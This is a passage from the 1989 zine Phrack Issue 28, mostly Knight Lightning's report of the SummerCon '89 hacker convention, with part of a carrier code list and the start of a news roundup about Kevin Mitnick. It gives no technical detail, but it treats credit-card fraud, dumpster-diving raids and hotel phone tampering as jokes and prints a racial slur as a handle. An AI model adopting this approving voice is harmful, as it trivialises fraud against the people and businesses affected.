  2239. 955     United Communications
  2240. 960     Access Plus
  2241. 963     Tenex Communications
  2242. 969     Dial-Net
  2243. 985     America Calling
  2244. 986     MCI Telecommunications (SBS)
  2245. 987     ClayDesta Communications
  2246. 988     Western Union Telegraph
  2247. 991     Access Long Distance
  2248. ____________________________________________________________
  2249.  
  2250.                                 ==Phrack Inc.==
  2251.  
  2252.                      Volume Three, Issue 28, File #8 of 12
  2253.  
  2254.            PWN ^*^ PWN ^*^ PWN { SummerCon '89 } PWN ^*^ PWN ^*^ PWN
  2255.            ^*^                                                   ^*^
  2256.            PWN         P h r a c k   W o r l d   N e w s         PWN
  2257.            ^*^         ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~         ^*^
  2258.            PWN            Special Edition Issue Three            PWN
  2259.            ^*^                                                   ^*^
  2260.            PWN       "Meet The Hackers Behind The Handles"       PWN
  2261.            ^*^                 June 23-25, 1989                  ^*^
  2262.            PWN                                                   PWN
  2263.            ^*^          Created, Written, and Edited             ^*^
  2264.            PWN               by Knight Lightning                 PWN
  2265.            ^*^                                                   ^*^
  2266.            PWN ^*^ PWN ^*^ PWN { SummerCon '89 } PWN ^*^ PWN ^*^ PWN
  2267.  
  2268.  
  2269. SummerCon... What is it?  In many ways, SummerCon is much more
  2270. than just a convention that attracts America's greatest phreaking
  2271. and hacking personalities.  SummerCon is a state of mind.
  2272.  
  2273. Hackers by nature are urged on by a hidden sense of adventure to
  2274. explore the unknown, to challenge the unchallenged, to reach out
  2275. and experiment with anything and everything.  The realization
  2276. that we are not alone in our quest sometimes comes as a great
  2277. gift and the opportunity to meet one's heroes, partners, and
  2278. idols can be the most awe-inspiring aspect of the hacker
  2279. community -- this is what SummerCon is all about.
  2280.  
  2281. On the surface, SummerCon looks like a handful of youths hanging
  2282. out at a hotel in St. Louis, Missouri.  To me, it is more like
  2283. one of those madcap movies you see on late night Home Box Office
  2284. or something.  No real point or direction, rebels without cause,
  2285. all in the name of frantic fun and games.  The atmosphere
  2286. surrounding SummerCon is that of a dream world where once a year
  2287. you can escape to a fantasy where ingenuity is king and you have
  2288. friends around you at every moment.  SummerCon itself may only
  2289. last a weekend, but the friendships last a lifetime.
  2290.  
  2291. Welcome to SummerCon '89!  This special edition of Phrack World
  2292. News contains the exclusive coverage of the events and activities
  2293. of a handful of the nation's greatest hackers on June 23-25,
  2294. 1989.
  2295.  
  2296.  
  2297. PreCon '89:  Knight Lightning and Taran King Make Plans
  2298. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We
  2299. remembered the fun at SummerCon '87 and how SummerCon '88 had
  2300. lacked something.  In a sense, the first SummerCon was very
  2301. private because almost all of the attendants were members on
  2302. Metal Shop Private, the bulletin board that was once the center
  2303. of the "elite" modem community.  The second SummerCon was a
  2304. little different.  Both Taran and I had been out of action for
  2305. nearly a year and we had not intended to hold another convention
  2306. ever again until June 1988 when we both decided that one good
  2307. convention deserves another.  SummerCon '88 was thrown together
  2308. and a few changes were made.  It was good, but this year we
  2309. decided to set our sights higher than ever.
  2310.  
  2311.  
  2312. PreCon '89:  The Early Birds                    Thursday Evening,
  2313. June 22, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The first guests to
  2314. this year's convention arrived a day ahead of schedule.  Control
  2315. C, a veteran of the previous two conventions, and Erik Bloodaxe
  2316. flew in to St. Louis on Thursday evening, June 22, 1989.  They
  2317. were greeted by Forest Ranger and then after some rowdy
  2318. activities at the airport, the threesome adjourned to the Best
  2319. Western Executive International hotel -- The very same hotel
  2320. where the first SummerCon was held in June 1987.
  2321.  
  2322. Around 10 PM, Taran King and I met up and being unable to locate
  2323. Control C, Erik Bloodaxe, and Forest Ranger, we decided to take a
  2324. trip to the hotel on the chance that they would be there by the
  2325. time we showed up.  As we approached the hotel, I felt a strange
  2326. sensation like deja-vu.  It had been two years since I had been
  2327. to the Executive International, or even anywhere near that part
  2328. of town (with the exception of the airport).  At any rate, luck
  2329. was on our side.  We raced through the newly remodeled hotel
  2330. lobby and out past the pool.  Control C's and Erik Bloodaxe's
  2331. room stuck out like a beacon.  Their room became known as the
  2332. "Doom Room" in recognition of the many members of the Legion of
  2333. Doom/Hackers that stayed there throughout the course of the
  2334. weekend.
  2335.  
  2336. Control C and Erik Bloodaxe told us all about Black Ice-Con which
  2337. had taken place the weekend prior to SummerCon '89 in Dallas,
  2338. Texas.  The supposedly secret convention had been infiltrated by
  2339. security agents from U.S. Sprint.  They believed that the leak
  2340. existed on Black Ice itself, the bulletin board from which the
  2341. con took its name and all members were invited (there were less
  2342. than 20 people on the board).  They named who they thought the
  2343. leak was, but discretion prevents printing his name here.  On a
  2344. side note, Black Ice was crashed by SuperNigger and abandoned by
  2345. the members of LOD thereafter.
  2346.  
  2347. Erik had some interesting business cards with him.  He passed
  2348. several of them out to interested hackers and other miscellaneous
  2349. people at the hotel and in the St. Louis metropolitan area as
  2350. well.  These cards featured Erik Bloodaxe and the following
  2351. organizations;
  2352.  
  2353. -    American Telephone & Telegraph [AT&T] -    Federal Bureau of
  2354. Investigation [FBI] (Department of Justice) -    Secret Service
  2355. (Department of Treasury) -    Southwestern Bell Telephone Company
  2356. -    Tymnet (McDonnel Douglas)
  2357.  
  2358. Erik gave Taran and I each a set of the cards as souvenirs of his
  2359. visit.  Both of us had to work early morning shifts the next day
  2360. so a little after midnight we decided to leave.  I finally went
  2361. to sleep around 1 AM.
  2362.  
  2363.  
  2364. SummerCon '89:  The Adventure Begins              Friday Morning,
  2365. June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I woke up
  2366. around 5 AM to begin my day.  I had arranged to work the morning
  2367. shift 6-10 AM in order to avoid having to work the rest of the
  2368. day and weekend.  I returned home around 10:30 AM and I began the
  2369. final work on Phrack 27.  Although the issue date is June 20,
  2370. 1989, we did not really release the issue until June 27, due to
  2371. complications with SummerCon '89 and other events.  All of the
  2372. sudden I received a call from another veteran of SummerCons past,
  2373. a person who swore that he would not appear at this year's
  2374. convention...  TUC!
  2375.  
  2376. He tried to convince me that he was in Florida or anywhere but
  2377. St. Louis.  I asked him if he needed a ride from the airport to
  2378. the hotel or something.  The call sounded local as hell, but he
  2379. insisted on remaining consistent with his story for another few
  2380. minutes.  Then my call waiting beeped and it was Taran King.  I
  2381. juggled the lines for a few minutes and then had Taran call Tuc
  2382. (who was at the Executive International) while I got ready to go
  2383. meet him at the hotel.
  2384.  
  2385. As I was leaving my home, I noticed something sticking to the
  2386. front door.  It was a notice from United Parcel Service.  How
  2387. odd.  I did not notice it at 10:30 AM when I returned home and I
  2388. did not not hear anyone knock on the door since I had been home.
  2389. Still, the note said that they had left my package at the
  2390. subdivision club house.
  2391.  
  2392. So I dropped in there and found my package... would you believe
  2393. it came from Francis J. Haynes... Frank of "Frank and the Phunny
  2394. Phone Call" himself and that is exactly what was inside:  A
  2395. cassette tape sampler of Frank and the Phunny Phone Call.
  2396. Incidentally, Frank is being mastered on to compact disc and will
  2397. be available for sale soon.  More details on this will appear in
  2398. Phrack World News in the near future.
  2399.  
  2400. Eventually, I reached the hotel.  Control C and Erik Bloodaxe
  2401. were nowhere to be found and Forest Ranger and Taran King were
  2402. unavailable.  I found Tuc and we decided to go grab lunch and
  2403. drive around for a while.
  2404.  
  2405. We returned to the hotel and traded war stories about the past
  2406. year and decided to call the hotel office to see who might have
  2407. checked in during the past few hours.  No one we recognized was
  2408. here yet, but there was a call for Tuc on another line.  The lady
  2409. at the office switched the call into Tuc's room and I picked it
  2410. up.
  2411.  
  2412. It was Crimson Death of 618.  He wanted us to know that he was
  2413. arriving by bus later that evening and would need a ride at about
  2414. 10:45 PM.  He also informed us that Dr. Cypher was on his way in
  2415. and would arrived at the airport's bus terminal and take the
  2416. shuttle to the hotel.  He was unsure about what time this would
  2417. occur.
  2418.  
  2419. I told him I could pick him up at the bus terminal and that I had
  2420. to get off the phone.  I did, you see because it was at about
  2421. this time that Tuc had opened the windows and looked out by the
  2422. pool terrace.  Control C, Erik Bloodaxe, Forest Ranger, The
  2423. Urvile, and a guy by the name of Phil Free (known under various
  2424. other handles including Judas Christ) were out poolside and upon
  2425. noticing us had run over to climb through the window into the
  2426. room.
  2427.  
  2428.  
  2429. A Gathering Of Phreaks                          Friday Afternoon,
  2430. June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~ Finally the convention began
  2431. to get underway.  Greetings were exchanged and some discussion
  2432. about last year's convention took place.  I had brought laser
  2433. printed copies of Phracks 21 - 26 into Tuc's room and everyone
  2434. was interested in taking a look.  The Urvile was especially
  2435. curious about a certain quicknote that appeared in Phrack World
  2436. News Issue XXV/Part 3.  I would guess that the particular
  2437. quicknote in question was number five...it was about Telenet
  2438. security, but this is a story for another day.
  2439.  
  2440. The phone rang and Tuc answered.  He handed the phone to Control
  2441. C, who then disappeared without saying anything.  It was obvious
  2442. that Lex Luthor had arrived.  However, he wished to make his
  2443. current state of residence remain anonymous and so he decided to
  2444. park his car someplace other than the hotel parking lot and thus
  2445. he needed covert assistance.  After a few minutes Control C
  2446. returned with Lex and then all of the LODies ran quickly to the
  2447. Doom Room.  Taran King showed up around this time and then Tuc,
  2448. FR, TK, and I joined the others.
  2449.  
  2450. Shortly afterwards, Taran King, Erik Bloodaxe, and I decided to
  2451. go have a listen to Frank and the Phunny Phone Call.  I had not
  2452. played it yet and so we set up in the hotel lobby.  The first
  2453. part of the tape was not about Frank at all.  It was a
  2454. never-released, newly produced musical selection that seemed to
  2455. be called "My Telephone Is Acting Crazy."  It was interesting as
  2456. it employed different familiar telephone error messages, common
  2457. types of recordings, and touch tones.  When the actual Frank
  2458. messages began, we stopped the tape and left the lobby
  2459. immediately to avoid being thrown out -- the language was a
  2460. little too obscene for the conservative employees behind the
  2461. desk.  So we wandered the hotel looking for a place to play the
  2462. tape.  In the process we met Doc Holiday and Hugo Danner.
  2463.  
  2464. We finally gained access to Tuc's room (he was with Forest
  2465. Ranger, Phil Free, and the LOD in the Doom Room).  Doc Holiday
  2466. and Hugo went to drop their bags off in their room and ended up
  2467. in the Doom Room as well.  TK, EB, and I remained in Tuc's room
  2468. to hear the rest of the tape.  There was a knock at the door...
  2469. it was Bill From RNOC.
  2470.  
  2471. Taran and BFR disappeared almost instantly as Erik Bloodaxe began
  2472. to pursue Bill.  He evidently had some score to settle.  However,
  2473. TK and BFR were gone as if they had become invisible.  Erik
  2474. decided to finish listening to the tape.  We did and then went on
  2475. to the Doom Room where we discovered Lucifer 666 and Synthetic
  2476. Slug had arrived.  L666 had many stories to tell about their trip
  2477. to St. Louis and he also brought a video camera.  His biggest
  2478. concern was that his camera would scare the hell out of Lex...
  2479. and to some extent it did.  You see, as it was explained to me by
  2480. the LOD members (with Lex Luthor absent at the time) there is
  2481. paranoia and beyond paranoia, there is Lex.
  2482.  
  2483.  
  2484. SummerCon Craziness                             Friday Afternoon,
  2485. June 23, 1989 ~~~~~~~~~~~~~~~~~~~ As many readers might already
  2486. known, St. Louis is the world headquarters for McDonnell Douglas
  2487. Aircraft, the firm that also owns Tymnet.  This was no secret to
  2488. the Legion of Doom, who led a series of successful trashing raids
  2489. on them as well as Southwestern Bell and IBM.  The way I heard
  2490. it, they even took pictures.
  2491.  
  2492. Meanwhile, after spending some time hanging out with the gang at
  2493. the Executive International, Bill From RNOC, Taran King, Tuc, Lex
  2494. Luthor, and I went to get a bite to eat.  We ended up at Wendy's
  2495. because Tuc, being a vegetarian, wanted the salad bar.  We had a
  2496. little fun harassing the staff (who still owes BFR an iced tea).
  2497. We began to speculate on who this year's security agent would
  2498. be... after all there is always some informant or plant at
  2499. SummerCon -- it has become a tradition.
  2500.  
  2501. At this point, everyone's best bet was on Dr. Cypher.  Cypher had
  2502. admitted to having connections on the security side of things,
  2503. had once claimed to be busted and/or retired, supposedly told
  2504. U.S. Sprint all about Black Ice Con (to hell with discretion),
  2505. and all in all, was the major unknown who best fit the mold set
  2506. forth by Dan The Operator at SummerCon '87 (although his friend
  2507. that showed up with him, Cryptic Fist fit the mold rather well
  2508. too, but this is detailed later).  This is just what I had
  2509. gathered from various people at the convention and are not
  2510. necessarily my personal views.
  2511.  
  2512. The obvious telephone security person there was from Michigan
  2513. Bell -- Control C -- But no one was really worried about him.  He
  2514. had been able to attend Black Ice-Con and SummerCon '88 all
  2515. expenses paid by Michigan Bell, but he said that since his
  2516. superiors have read the PWN reports of SummerCons past, they felt
  2517. that this trip was pleasure, not business, and would not give him
  2518. a free ride any longer.
  2519.  
  2520. I hate to break this to the security folks out there, but
  2521. honestly, do you think I would write an article and include
  2522. information like whose computers, passwords, codes, and whatever
  2523. were handed out and discussed?  Why create negative publicity
  2524. like that.  Don't you all worry though... none of that EVER goes
  2525. on at SummerCon :-)
  2526.  
  2527. Before we left Wendy's, Tuc and BFR grabbed a stack of taco
  2528. shells and as we journeyed towards the hotel, BFR and Tuc
  2529. proceeded to throw parts of these shells at other vehicles and
  2530. pedestrians.  A few minutes after we had returned, everyone began
  2531. getting together to go pickup Android Pope (aka Cisban Evil
  2532. Priest) at the airport.  It was 7:15 PM by now and his flight
  2533. from New Jersey was supposed to arrive at 7:54 PM.
  2534.  
  2535.                "Are you an agent of the FBI or Secret Service?!"
  2536.  
  2537. This was Lucifer 666's standard question that he asked everyone
  2538. he came into contact with at the hotel -- guests, office
  2539. personnel, porters, and even the shuttle bus driver.  They all
  2540. replied with a confused "no."  It seemed to take an hour to get
  2541. the shuttle bus ready for passengers.  Bill From RNOC, Taran
  2542. King, and I were going to just hang out at the hotel, but I was
  2543. shanghaied on to the bus to the airport.
  2544.  
  2545. Just before we took off, the older gentleman that was serving as
  2546. our bus driver turned around and said, "You know how you fellas
  2547. were asking me if I was with the FBI..."  We all froze instantly
  2548. as he pulled out his badge.  No, he was not with the FBI, but he
  2549. was a recently retired deputy police chief for the St.  Louis
  2550. County Police Department.  Control C later remarked to me that
  2551. when the driver had shown his badge, he had half expected to hear
  2552. a loud series of clicks as the locks to all of the doors on the
  2553. shuttle bus shut and a barrier of some sort appeared between the
  2554. driver and the passengers... all of whom were SummerCon guests.
  2555.  
  2556. Instead, several of the hackers, Hugo and Forest Ranger for the
  2557. most part, began to question the retired officer about his gun
  2558. fights.  The driver remarked how he had been shot before and even
  2559. went so far as to show us some of his scars.  Lucifer asked, "Did
  2560. you kill the guy who shot you?"  The driver responded,
  2561. "Certainly."  This line of questioning went on for the duration
  2562. of the trip.  We got to the airport and moved out.
  2563.  
  2564.  
  2565. Erik Bloodaxe:  Missing In Action                 Friday Evening, June 23, 1989
  2566. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2567. Upon entering the lower terminal of Lambert Field (St. Louis
  2568. International Airport), this "motley crew" encountered a blonde
  2569. bombshell named Stephanie on one of the nearby payphones.
  2570. Control C was the first to approach her and he asked her if she
  2571. was talking to her boyfriend.  She wasn't and so he proceeded to
  2572. take the handset and talk to her friend.  In the meantime,
  2573. Lucifer 666 was filming the entire affair and several members of
  2574. the group (not including Lex or Tuc) began having their pictures
  2575. taken with blondie.  This situation soon turned to riot as almost
  2576. everyone wanted in on this action.  Eventually we shuffled off to
  2577. the American Airlines ticket counter to check up on Android
  2578. Pope's flight while Forest Ranger apologized for our behavior.
  2579.  
  2580. The scene at the ticket counter was somewhat grim.  You see
  2581. Android Pope was scheduled to arrive at 7:54 PM and apparently
  2582. the flight's arrival had been delayed... until 9:00 PM at the
  2583. earliest.  In the meantime, Forest Ranger was having a little
  2584. chat with Erik Bloodaxe.  He told EB that the blondie chick
  2585. thought he was a big geek and some other nasty things.  Erik
  2586. became so depressed that he headed back to talk to her again, but
  2587. none of us knew it at the time.
  2588.  
  2589. So now we had to kill an hour.  We started towards the far end of
  2590. the airport where a restaurant and bar were located.  On the way,
  2591. we encountered some people striking against Eastern and
  2592. Continental Airlines and handing out stickers that showed
  2593. "Lorenzo" with a circle around his name and a line through it
  2594. (much like a no U-turn sign or the NO FEDS pin from SummerCon
  2595. '88).  We took a lot of those stickers and put them on
  2596. unsuspecting people all over the airport.
  2597.  
  2598. Upon reaching the area just outside of the bar, we found a row of
  2599. payphones, a fancy vintage replica of a car, and a wheelchair.
  2600. Control C hopped into the chair (deja vu of SummerCon '87
  2601. occurred here when I remembered how Control C ended up in a
  2602. swimming pool last time) and Lucifer 666 started driving him all
  2603. about the airport.  The problem was that the wheelchair belonged
  2604. to this lady who was on the payphones and when she finally
  2605. noticed that it was missing she tracked Control and L666 down
  2606. screaming theft.
  2607.  
  2608. Finally we got to the bar.  We sat down and talked for a while
  2609. watching planes take off and land.  After a few minutes I noticed
  2610. that Erik had disappeared.  We retraced our steps all the way
  2611. back to the payphones where we encountered blondie without any
  2612. success whatsoever.  Then we went to the American Airlines ticket
  2613. counter and had Erik paged.  We also did the same thing at the
  2614. Trans World Airlines and Braniff ticket counters.
  2615.  
  2616. Since we could not find him, about half of us decided it was time
  2617. to head back to the hotel and let the rest of the group wait for
  2618. Android Pope.  We all went out to the street where the buses stop
  2619. and waited.  A very strange incident took place here.  Another
  2620. group of guys ventured forth with a person who was blindfolded
  2621. and handcuffed.  They said, "This is what happens when you break
  2622. the law guys... illegal trafficking in cocaine... Columbian."
  2623. Forest Ranger asked if they had any to spare.  Oddly enough, they
  2624. had their own video camera and were filming this and us while we
  2625. were filming them.  They soon disappeared into a parking garage.
  2626.  
  2627. Eventually the bus came and picked us up.  The Urvile, Lucifer
  2628. 666, Tuc, and Doc Holiday stayed behind to search for Android
  2629. Pope.  They caught a later shuttle bus back to the hotel.
  2630. However, mere moments after they had arrived, Dr. Cypher showed
  2631. up claiming he had just got off the shuttle bus.  Obviously this
  2632. could not be true because these buses are very small and there is
  2633. no way L666, Urvile, Tuc, DH, and AP could have missed him and
  2634. his friend Cryptic Fist.
  2635.  
  2636. It was around 11:00 PM when I remembered that Crimson Death was
  2637. due at the bus station downtown.  Bill From RNOC and Taran King
  2638. accompanied me to go pick him up and were we ever surprised when
  2639. we saw him.  He was no longer the short little kid we had met at
  2640. SummerCon '88.
  2641.  
  2642. We returned to the hotel to discover that Erik Bloodaxe had
  2643. finally made it back.  After hearing what Forest Ranger told him
  2644. about what Stephanie had to say (calling him a geek or something
  2645. similar), he decided to go to her again.  He walked with her to
  2646. her gate and stayed until her plane left.  He later remarked that
  2647. he had heard us paging him, but decided to ignore it.  After his
  2648. return, the entire SummerCon group headed out to the midnight
  2649. showing of the premiere day of "Batman."  L666 attempted to sneak
  2650. his video camera into the movie, but changed his mind and did a
  2651. "jaywalk" instead.  After the flick everyone just hung out for a
  2652. while.  The Doom Room crew went to sleep because Control C had an
  2653. early flight to catch the next morning and Taran and I crashed
  2654. around 5:30 AM.
  2655.  
  2656.  
  2657. Conference Day A.M.                             Saturday Morning, June 24, 1989
  2658. ~~~~~~~~~~~~~~~~~~~
  2659. The hotel was trashed.  Forest Ranger and Lucifer 666 watched as
  2660. the hotel employees were forced to clean up the mess that was
  2661. left behind after the previous evening's activities.  One maid
  2662. remarked, "I know my boss wants your business, but he sure as
  2663. hell don't want all these beer cans."  Control C was gone, but he
  2664. had performed a practical joke on Lucifer 666 and Synthetic Slug
  2665. before he left, leaning a trashcan full of ice on their door so
  2666. that when it was opened, all of the ice would fall into the room.
  2667. According to Erik Bloodaxe, Control C also walked off with a jean
  2668. jacket that did not belong to him -- No honor among hackers?
  2669.  
  2670. Aristotle and Predat0r arrived sometime during the morning with a
  2671. small suitcase full of TAP issues and other materials for the
  2672. convention.  Crimson Death lit a pizza on fire in one of the
  2673. rooms in order to perform a demonic ritual that was reminiscent
  2674. of the first SummerCon (1987) when Lucifer 666 attempted
  2675. (unsuccessfully) to eat fire.
  2676.  
  2677.  
  2678. The Conference                                Saturday Afternoon, June 24, 1989
  2679. ~~~~~~~~~~~~~~
  2680. It was at this time that Taran King, Forest Ranger, and I handed
  2681. out the Official SummerCon '89 buttons and posters.  In addition
  2682. to this, I handed out keychain flashlights that showed the logo
  2683. of Ameritech as well as a few specially designed "Legion" buttons
  2684. to the LOD members that were there.
  2685.  
  2686. Forest Ranger got things started by welcoming everyone to the
  2687. conference and asking them to take a seat.  Mysteriously, Dr.
  2688. Cypher had decided not to attend the conference, but his pal
  2689. Cryptic Fist was there with a micro-tape recorder in the pocket
  2690. of his leather jacket (that he refused to take off even though it
  2691. was a blistering 94 degrees).
  2692.  
  2693. Our first speaker was Aristotle.  He talked for a while about the
  2694. new TAP Magazine, how it worked, and how to subscribe.  He took
  2695. quite a beating from the large amount of criticism directed at
  2696. him because of the lack of originality in the name of the
  2697. publication as well as not having been given official permission
  2698. to use the name.  As it turns out, the ownership of the TAP name
  2699. currently resides with Tuc.  Tuc was there at the conference, so
  2700. Aristotle put the question to him, "Can I do it?"  Tuc basically
  2701. said he thought it was ok, but he wanted to talk to Cheshire
  2702. Catalyst about it.  The situation remains unresolved.
  2703.  
  2704. The next speaker was Lex Luthor.  Lex discussed a topic that was
  2705. a little more familiar to most everyone at the conference -- Code
  2706. Abuse.   For the most part, he presented the standard methods in
  2707. which companies try and track down code abusers and strongly
  2708. advised that everyone not abuse codes.  He also went on to
  2709. criticize Brew Associates for releasing a new edition of Code
  2710. Thief.
  2711.  
  2712. Taran and I spoke next.  For the most part we talked about Phrack
  2713. Inc. and what lies ahead concerning the newsletter.  We also
  2714. brought up discussion on the Internet and the plausibility of
  2715. security agencies using "grep" to track down hackers across the
  2716. world.  We also discussed our recent excursion through a GTE
  2717. Central Office and what we found.
  2718.  
  2719. The Urvile gave a short lecture on Unix hacking and then it was
  2720. Bill From RNOC's turn to speak.  For the most part, he discussed
  2721. 2600 Meetings (that take place once a month at The Citicorp
  2722. Center in New York City).  He spoke briefly about Eric Corley and
  2723. the publication 2600 Magazine.  Afterwards, he played a humorous
  2724. recording in which he engineered an insane gentleman to believe
  2725. that he was a news reporter and got his story about computers in
  2726. Utah taking over the world.  That concluded the regularly
  2727. scheduled speakers.
  2728.  
  2729. Group discussion began and the topics included:  TelePub '86,
  2730. Scan Man, Cheshire Catalyst, The Bootleg, and Red Knight.  We
  2731. listened to segments of Frank and The Phunny Phone Call and Group
  2732. Bell Presents the Adventures of Dom Tuffy for a while and then
  2733. started being really creative.  In a high spirited moment we
  2734. formed a large human pyramid and took pictures (that are supposed
  2735. to appear in TAP Magazine's next issue).
  2736.  
  2737.  
  2738. Poolside and Mellow                             Saturday Evening, June 24, 1989
  2739. ~~~~~~~~~~~~~~~~~~~
  2740. Aristotle, Predat0r, Doc Holiday, and Hugo Danner had to hit the
  2741. road soon after the convention ended.  However, another friend
  2742. named Stephan showed up after the conference and so did Doctor
  2743. Cypher with ParMaster and Rabbit.  Cypher told us a story about
  2744. how PM and Rabbit had carded plane tickets to St.  Louis and
  2745. stayed at the Holiday Inn-West.  However, after running up huge
  2746. tabs at the hotel, the management asked them to pay up in cash
  2747. and would not accept their credit card numbers.  They made a
  2748. narrow escape from the hotel and arrived at Best Western to stay
  2749. the night.
  2750.  
  2751. Par and Rabbit were very outgoing, they wanted to have Tuc, Lex,
  2752. and Erik come to their yacht in New York and go sailing.  It was
  2753. a very strange situation and parts of their story still do not
  2754. seem to make sense even today.  However, they proceeded to "fuck
  2755. the phones" at the hotel so that all calls going to the front
  2756. desk would be intercepted into BFR's room.  This was not very
  2757. pleasurable.
  2758.  
  2759. Most people went downtown for dinner that night and then everyone
  2760. ended up outside by the pool having a few drinks.  At one point
  2761. in the evening, Taran, BFR, Stephan, Forest Ranger, and I went
  2762. back to BFR's room and were followed by Erik Bloodaxe.  He
  2763. accused Bill of being a cocaine dealer and Forest Ranger erupted,
  2764. "THAT'S NOT COOL FUCKING WITH RNOC MAN!" and the two of them
  2765. (Erik and FR) came very close to blows.  It was soon settled and
  2766. the partying resumed.  A small group of us went on a mission that
  2767. night and what we discovered is a story for another day, but it
  2768. kept us busy until almost 6 AM.
  2769.  
  2770.  
  2771. So Long Farewell                                          Sunday, June 25, 1989
  2772. ~~~~~~~~~~~~~~~~
  2773. With the exception of Erik Bloodaxe, the Legion of Doom gang had
  2774. disappeared by the time Taran and I showed up at Best Western.
  2775. In fact, the only other hackers remaining in the vicinity were
  2776. Forest Ranger, BFR, Stephan, L666, and Synthetic Slug as far as
  2777. we could tell.  We said goodbye to L666 and SS and the rest of us
  2778. (not including Erik Bloodaxe, Tuc and Crimson Death who we found
  2779. out later were still in town) journeyed to Westport Plaza where
  2780. we spent the rest of the afternoon until it was time for BFR and
  2781. Stephan to catch their flights.  And that was SummerCon '89.
  2782. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2783.  
  2784. The following are the people who attended SummerCon '89:  (23
  2785. Total)
  2786.  
  2787.              Android Pope \ Aristotle \ Bill From RNOC \ Control
  2788.   C Crimson Death \ Cryptic Fist \ Doc Holiday \ Doctor Cypher \
  2789.   Erik Bloodaxe
  2790.    Forest Ranger \ Hugo Danner \ Knight Lightning \ Lex Luthor \
  2791.      Lucifer 666 ParMaster \ Phil Free \ Predat0r \ Rabbit \
  2792.      Stephan \ Synthetic Slug
  2793.                          Taran King \ Tuc \ The Urvile
  2794.  
  2795. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2796.  
  2797. Who Didn't Attend SummerCon '89... And Why!
  2798. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2799. Ax Murderer:  "Definitely next year."
  2800. Bad Subscript:  "Dan wouldn't pay for me this time."
  2801. Broadway Hacker:  "I have a date that weekend."
  2802. Cheshire Catalyst:  "I have a HAM convention."
  2803. CompuPhreak:  "I was trying to fix my Watson."
  2804. Eric Corley:  "It's either this or GHP."
  2805. Cray-Z Phreaker and SkunkWorks gang:  "I was competing in a regatta."
  2806. DarkMage:  "My hard disk drive broke and I need the cash to fix it."
  2807. The Datamaster, Peter Pulse, Magnetic Surfer:  "It should be in New York City."
  2808. Dave Starr:  (Disappeared off of the face of the earth again)
  2809. Dead Lord:  "I was at camp."
  2810. Delta-Master:  "I am going to the Galactic Hackers Party too."  (No show)
  2811. The Disk Jockey and Shade:  "I thought it was next weekend...sorry."
  2812. Epsilon:  "My mom said she didn't feel like going to St. Louis."
  2813. The Executioner:  "I had a beauty shop appointment."
  2814. Katie Hafner:  "Forest Ranger would not let me go."
  2815. Hatchet Molly:  "I got married."
  2816. Karl Marx:  "I had a job interview... sue me."
  2817. The Leftist:  "<Sniff> I'm in the hospital."
  2818. MAC???:  "Why don't you guys have it in California this year?"
  2819. John Maxfield:  "I was there... the Holiday Inn-West, right?"
  2820. The Mentor:  "I'll have my own in Texas instead."
  2821. Oryan QUEST:  "I got deported."
  2822. Phantom Phreaker and Doom Prophet:  "We went camping... with our parents."
  2823. Phrozen Ghost and Surfer Bob:  "Scared of seeing Crimson Death."
  2824. Promethius:  "I decided to spend the weekend with Broadway Hacker instead."
  2825. Red Knight:  "I was in Kenya visiting relatives."
  2826. Remington Steal and Chanda Leir:  "We'd rather be alone if you don't mind."
  2827. Sigmund Fraud:  "I still have another 7 or 8 weeks of basic training."
  2828. Silver Spy:  "I'll be there if I can."
  2829. Sir Francis Drake:  "Had to get my other nostril pierced."
  2830. The Renegade Chemist:  "I didn't feel like taking the heat for MY TAP."
  2831. Tuc:  "I am never coming to another convention again... whoops!"
  2832. VaxCat and Phase Shifter:  (In August) "When is that anyway?"
  2833. Violence and The Scythian:  "We got busted by SoutherNet, but we'll be there!"
  2834.  
  2835. Needless to say, those who missed the convention, missed out.  Plans are
  2836. already underway for SummerCon '90 --KL
  2837. __________________________________________________________________
  2838.  
  2839.                                 ==Phrack Inc.==
  2840.  
  2841.                      Volume Three, Issue 28, File #9 of 12
  2842.  
  2843.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2844.             PWN                                                 PWN
  2845.             PWN        P h r a c k   W o r l d   N e w s        PWN
  2846.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  2847.             PWN               Issue XXVIII/Part 1               PWN
  2848.             PWN                                                 PWN
  2849.             PWN                 October 7, 1989                 PWN
  2850.             PWN                                                 PWN
  2851.             PWN          Created, Written, and Edited           PWN
  2852.             PWN               by Knight Lightning               PWN
  2853.             PWN                                                 PWN
  2854.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2855.  
  2856.  
  2857.                  Welcome to Issue XXVIII of Phrack World News!
  2858.  
  2859. This issue of Phrack World News contains stories and articles
  2860. detailing events from June - October, 1989 and features Bellcore,
  2861. Chalisti, Chaos Computer Club, Clifford Stoll, The Disk Jockey,
  2862. Fry Guy, The Grim Phreaker, Legion of Doom, The Leftist, Major
  2863. Havoc, Kevin Mitnick, Robert Morris, Oryan QUEST, The Prophet,
  2864. Red Rebel, Shadow Stalker, Shadow 2600, Terra, The Urvile, and
  2865. much more so keep reading.
  2866.  
  2867.         "The Real Future Is Behind You... And It's Only The
  2868. Beginning!"
  2869. _______________________________________________________________________________
  2870.  
  2871. Judge Suggests Computer Hacker Undergo Counseling
  2872. July 17, 1989
  2873. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2874. by Karen E. Klein (New York Times)
  2875.  
  2876. LOS ANGELES -- A federal judge has suggested that Los Angeles
  2877. computer hacker Kevin Mitnick be sentenced to a one-year
  2878. residential treatment program to break his "computer addiction."
  2879.  
  2880. Although she did not finalize her sentence, U.S. District Judge
  2881. Mariana R.  Pfaelzer said Monday that she thought Mitnick had
  2882. some problems that would
  2883. benefit from counseling.
  2884.  
  2885. Pfaelzer will actually pass sentence at a hearing set for
  2886. Tuesday, July 18.
  2887.  
